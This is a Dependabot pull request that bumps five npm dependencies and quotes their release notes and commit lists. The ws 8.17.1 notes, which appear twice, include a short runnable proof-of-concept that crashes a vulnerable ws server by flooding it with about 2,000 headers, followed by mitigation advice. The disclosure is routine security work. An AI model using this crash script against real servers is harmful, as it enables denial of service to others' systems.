chore(deps): Bump the npm_and_yarn group across 2 directories with 5 updates

[dependabot]

Bumps the npm_and_yarn group with 5 updates in the / directory:

Package	From	To
ws	8.17.0	8.17.1
braces	3.0.2	3.0.3
fast-loops	1.1.3	1.1.4
fast-xml-parser	4.3.6	4.4.1
undici	6.16.1	6.19.5

Bumps the npm_and_yarn group with 1 update in the /libs/connector directory: ws.

Updates ws from 8.17.0 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• See full diff in compare view

Updates braces from 3.0.2 to 3.0.3

Commits

• 74b2db2 3.0.3
• 88f1429 update eslint. lint, fix unit tests.
• 415d660 Snyk js braces 6838727 (#40)
• 190510f fix tests, skip 1 test in test/braces.expand
• 716eb9f readme bump
• a5851e5 Merge pull request #37 from coderaiser/fix/vulnerability
• 2092bd1 feature: braces: add maxSymbols (https://github.com/micromatch/braces/issues/...
• 9f5b4cf fix: vulnerability (https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727)
• 98414f9 remove funding file
• 665ab5d update keepEscaping doc (#27)
• Additional commits viewable in compare view

Updates fast-loops from 1.1.3 to 1.1.4

Commits

• See full diff in compare view

Updates fast-xml-parser from 4.3.6 to 4.4.1

Changelog

Sourced from fast-xml-parser's changelog.

Note: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.

4.4.1 / 2024-07-28

• v5 fix: maximum length limit to currency value
• fix #634: build attributes with oneListGroup and attributesGroupName (#653)(By Andreas Naziris)
• fix: get oneListGroup to work as expected for array of strings (#662)(By Andreas Naziris)

4.4.0 / 2024-05-18

• fix #654: parse attribute list correctly for self closing stop node.
• fix: validator bug when closing tag is not opened. (#647) (By Ryosuke Fukatani)
• fix #581: typings; return type of tagValueProcessor & attributeValueProcessor (#582) (By monholm)

4.3.6 / 2024-03-16

• Add support for parsing HTML numeric entities (#645) (By Jonas Schade )

4.3.5 / 2024-02-24

• code for v5 is added for experimental use

4.3.4 / 2024-01-10

• fix: Don't escape entities in CDATA sections (#633) (By wackbyte)

4.3.3 / 2024-01-10

• Remove unnecessary regex

4.3.2 / 2023-10-02

• fix jObj.hasOwnProperty when give input is null (By Arda TANRIKULU)

4.3.1 / 2023-09-24

• revert back "Fix typings for builder and parser to make return type generic" to avoid failure of existing projects. Need to decide a common approach.

4.3.0 / 2023-09-20

• Fix stopNodes to work with removeNSPrefix (#607) (#608) (By [Craig Andrews]https://github.com/candrews))
• Fix #610 ignore properties set to Object.prototype
• Fix typings for builder and parser to make return type generic (By Sarah Dayan)

4.2.7 / 2023-07-30

• Fix: builder should set text node correctly when only textnode is present (#589) (By qianqing)
• Fix: Fix for null and undefined attributes when building xml (#585) (#598). A null or undefined value should be ignored. (By Eugenio Ceschia)

4.2.6 / 2023-07-17

• Fix: Remove trailing slash from jPath for self-closing tags (#595) (By Maciej Radzikowski)

4.2.5 / 2023-06-22

• change code implementation

4.2.4 / 2023-06-06

• fix security bug

4.2.3 / 2023-06-05

• fix security bug

... (truncated)

Commits

• d40e29c update package detail and browser bundles
• d0bfe8a fix maxlength for currency value
• 2c14fcf Update bug-report-or-unexpected-output.md
• acf610f fix #634: build attributes with oneListGroup and attributesGroupName (#653)
• 931e910 fix: get oneListGroup to work as expected for array of strings (#662)
• b8e40c8 Update ISSUE_TEMPLATE.md
• a6265ba chore: add trend image (#658)
• db1c548 redesign README.md
• 338a2c6 Rename 1.Getting Started.md to 1.GettingStarted.md
• c762537 Rename v5 docs filenames (#659)
• Additional commits viewable in compare view

Updates undici from 6.16.1 to 6.19.5

Release notes

Sourced from undici's releases.

v6.19.5

Full Changelog: nodejs/undici@v6.19.4...v6.19.5

v6.19.4

Full Changelog: nodejs/undici@v6.19.3...v6.19.4

v6.19.3

Full Changelog: nodejs/undici@v6.19.2...v6.19.3

v6.19.2

What's Changed

• fix #3337 by @​KhafraDev in nodejs/undici#3338
• build: use husky as husky install is deprecated by @​jazelly in nodejs/undici#3340
• fix: interceptors.d.ts has no default export by @​Uzlopak in nodejs/undici#3332

Full Changelog: nodejs/undici@v6.19.1...v6.19.2

v6.19.1

What's Changed

• don't append empty origin by @​KhafraDev in nodejs/undici#3335

Full Changelog: nodejs/undici@v6.19.0...v6.19.1

v6.19.0

What's Changed

• build(deps): bump ossf/scorecard-action from 2.3.1 to 2.3.3 by @​dependabot in nodejs/undici#3305
• build(deps): bump codecov/codecov-action from 4.3.1 to 4.4.1 by @​dependabot in nodejs/undici#3303
• build(deps): bump step-security/harden-runner from 2.7.1 to 2.8.0 by @​dependabot in nodejs/undici#3304
• build(deps): bump github/codeql-action from 3.25.3 to 3.25.7 by @​dependabot in nodejs/undici#3306
• build(deps): bump node from 9e8f45f to dd7e693 in /build by @​dependabot in nodejs/undici#3309
• build(deps): bump node from dd7e693 to e6d4495 in /build by @​dependabot in nodejs/undici#3313
• remove websocket experimental warning by @​KhafraDev in nodejs/undici#3311
• perf: optimization of request instantiation by @​tsctx in nodejs/undici#3107
• perf: convert object to params by @​DarkGL in nodejs/undici#3302
• build(deps-dev): bump borp from 0.14.0 to 0.15.0 by @​dependabot in nodejs/undici#3320
• build(deps-dev): bump c8 from 9.1.0 to 10.0.0 by @​dependabot in nodejs/undici#3321
• fix: add missing error classes to types by @​maxbeatty in nodejs/undici#3316
• export interceptor to type def file by @​jakecastelli in nodejs/undici#3318
• build(deps): bump node from e6d4495 to 075a5cc in /build by @​dependabot in nodejs/undici#3326
• doc: clearify the behaviour of bodyTimeout in the request by @​jakecastelli in nodejs/undici#3324
• feature: support pre-shared sessions by @​tastypackets in nodejs/undici#3325

New Contributors

• @​maxbeatty made their first contribution in nodejs/undici#3316
• @​jakecastelli made their first contribution in nodejs/undici#3318

Full Changelog: nodejs/undici@v6.18.2...v6.19.0

... (truncated)

Commits

• 8499c4b Bumped v6.19.5
• 93605ab fix: restore externalized Node.js dep compatibility (#3421)
• 62241c3 Bumped v6.19.4
• e51aa88 Update esbuild to 0.19.10 (#3415)
• 99102cc Bumped v6.19.3
• b696a78 In CITGM, skip tests that are flaky there (#3413)
• 532b7b2 Bumped v6.19.2 (#3342)
• a7441d8 fix: interceptors.d.ts has no default export (#3332)
• 5dadb95 build: use husky as husky install is deprecated (#3340)
• 035524e fix #3337 (#3338)
• Additional commits viewable in compare view

Updates ws from 8.17.0 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot merge will merge this PR after your CI passes on it
• @dependabot squash and merge will squash and merge this PR after your CI passes on it
• @dependabot cancel merge will cancel a previously requested merge and block automerging
• @dependabot reopen will reopen this PR if it is closed
• @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.

[dependabot]

Superseded by #373.